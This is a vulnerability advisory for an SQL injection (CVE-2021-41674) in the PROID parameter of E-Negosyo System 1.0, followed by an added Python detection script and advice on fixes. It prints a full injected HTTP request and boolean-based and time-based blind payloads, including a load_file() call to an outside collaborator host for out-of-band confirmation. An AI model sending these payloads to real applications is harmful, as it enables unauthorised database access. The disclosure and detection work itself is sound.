CVE-2021-41674

Vendor

Software

Description:

The PROID parameter of the E-Negosyo System 1.0 application is vulnerable to SQL injection of two kinds: time-based blind and boolean-based blind. The payload '+(select load_file('\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\juc'))+' was submitted in the PROID parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path pointing at a host on an external domain. The application's database server contacted that domain, showing out-of-band that the injected SQL query was executed.

HTTP request (the injected PROID value is URL-encoded):

POST /bsenordering/cart/controller.php?action=add HTTP/1.1
Host: 192.168.1.2
Origin: http://192.168.1.2
Cookie: PHPSESSID=n2krmhjsahctm8bpj44kms36b4
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/bsenordering/index.php?q=product
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 57

PROPRICE=50&PROQTY=10&PROID=201735'%2b(select%20load_file('%5c%5c%5c%5c4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net%5c%5cjuc'))%2b'&btnorder=%C2%9E%C3%A9e

HTTP response:

HTTP/1.1 200 OK
Date: Sat, 30 Oct 2021 06:28:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Payloads

---
Parameter: PROID (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\\juc'))+'' OR NOT 5430=5430#&btnorder=%C2%9E%C3%A9e

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\\juc'))+'' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))cikV)-- oroY&btnorder=%C2%9E%C3%A9e
---
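The description and the payload listing above both show the same request shape: a quote that breaks out of a string literal in the PROID value, followed by a MySQL load_file() call with a UNC path, and optionally a tautology or SLEEP() suffix. The following detection script is an added example, not code from this repository; it URL-decodes form bodies the way the server would and flags the indicators a defender can look for in request logs or a WAF. The sample bodies are constructed from the payloads on this page, and the assumption that PROID, PROQTY and PROPRICE should be integers is mine, not documented by the project.

```python
import re
from urllib.parse import parse_qs

# Constructed sample request bodies. The first three reproduce the PROID payload
# shapes shown in the advisory above (URL-encoded as sent, then the boolean-based
# and time-based forms from the payload listing); the last is a benign order.
SAMPLE_BODIES = {
    "encoded_oob": (
        "PROPRICE=50&PROQTY=10&PROID=201735'%2b(select%20load_file('%5c%5c%5c%5c"
        "4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net"
        "%5c%5cjuc'))%2b'&btnorder=%C2%9E%C3%A9e"
    ),
    "boolean_blind": (
        r"PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\"
        r"4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net"
        r"\\juc'))+'' OR NOT 5430=5430#&btnorder=x"
    ),
    "time_blind": (
        r"PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\"
        r"4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net"
        r"\\juc'))+'' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))cikV)-- oroY&btnorder=x"
    ),
    "benign": "PROPRICE=50&PROQTY=10&PROID=201735&btnorder=Order",
}

# Assumption (not stated by the project): these form fields are integer ids/amounts.
NUMERIC_PARAMS = {"PROID", "PROQTY", "PROPRICE"}

# Indicators matched against each decoded parameter value.
INDICATORS = (
    # load_file('\\host\share') : MySQL file read with a UNC path (out-of-band probe)
    ("mysql_load_file_unc", re.compile(r"load_file\s*\(\s*'\\\\", re.I)),
    # SLEEP(n) : time-based blind marker
    ("time_based_sleep", re.compile(r"\bsleep\s*\(\s*\d+(?:\.\d+)?\s*\)", re.I)),
    # OR 1=1 / AND NOT 5=5 : boolean-based blind marker
    ("boolean_tautology", re.compile(r"\b(?:or|and)\s+(?:not\s+)?\d+\s*=\s*\d+", re.I)),
)


def decode_body(body):
    """URL-decode an application/x-www-form-urlencoded body into {name: value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def inspect_request(body):
    """Return a sorted list of (parameter, indicator) findings; empty means clean."""
    findings = set()
    for name, value in decode_body(body).items():
        # Type check first: a non-integer id is the cheapest, most robust signal.
        if name in NUMERIC_PARAMS and not value.isdigit():
            findings.add((name, "non_numeric_value"))
        for label, pattern in INDICATORS:
            if pattern.search(value):
                findings.add((name, label))
    return sorted(findings)


def classify(body):
    """Collapse findings into a single verdict for alerting."""
    return "suspect" if inspect_request(body) else "clean"


def scan_samples():
    """Classify every constructed sample body."""
    return {key: classify(body) for key, body in SAMPLE_BODIES.items()}


if __name__ == "__main__":
    for key, body in SAMPLE_BODIES.items():
        print(f"{key:14} {classify(body):8} {inspect_request(body)}")
```

The pattern matches are secondary; the non-numeric check on PROID catches every variant above without knowing the payload. The corresponding fix in the application is to bind PROID as an integer in a prepared statement rather than concatenating it into the query. At the database layer, MySQL only honours LOAD_FILE() for accounts holding the FILE privilege and within the secure_file_priv directory, and the UNC-path out-of-band interaction relies on the MySQL server running on Windows, as the Apache/Win64 banner in the response above suggests.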

Reproduce:

NOTE:

  • The PoC, a.k.a. CVE-SQL.py, is encrypted for security reasons!


Proof:
